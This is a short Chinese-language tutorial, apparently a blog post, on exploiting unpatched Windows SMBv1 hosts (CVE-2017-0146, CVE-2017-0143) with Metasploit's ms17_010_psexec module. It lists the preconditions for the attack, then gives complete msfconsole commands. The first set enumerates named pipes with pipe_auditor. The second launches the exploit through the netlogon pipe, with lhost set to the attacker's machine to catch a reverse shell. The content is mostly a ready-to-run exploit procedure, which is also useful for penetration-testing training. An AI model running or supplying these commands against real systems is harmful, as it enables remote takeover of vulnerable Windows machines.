一、ms17_010_psexec简介
MS17-010 的psexec是针对Microsoft Windows的两款最受欢迎的漏洞进行攻击。
CVE-2017-0146(EternalChampion / EternalSynergy)
CVE-2017-0143(EternalRomance / EternalSynergy)
与EternalBlue相比,此模块具有高可靠性和优先级,其中管道名可用于匿名登录(
二、使用ms17_010_psexec的前提
1.防火墙必须允许SMB流量出入
2.目标必须使用SMBv1协议
3.目标必须缺少MS17-010补丁
4.目标必须允许匿名IPC $和管道名
ms17_010图形化检测工具下载 #也可以用nmap、nessus或msf中自带模块进行扫描
三、利用
1. 用pipe_auditor扫描
首先利用scanner/smb/pipe_auditor模块扫描目标网段主机可用的管道名,其扫描出来的大多数为匿名的windows2003管道名,如需要扫描出更多的管道名,还需要提供可用的用户名和密码
use scanner/smb/pipe_auditor
set rhosts 192.168.131.128 //也可以设置网段,网段的时候要设置多线程,如,`set threads 10`
run
可以看到有这些管道名
netlogon lsarpc samr browser
2.利用ms17_010_psexec进行攻击
use exploit/windows/smb/ms17_010_psexec
set rhost 192.168.131.128
set NAMEDPIPE netlogon
set lhost 172.29.192.60 #接受反弹回来的shell的IP,一般为攻击机IP
run
新博客地址:https://www.dycsy.cn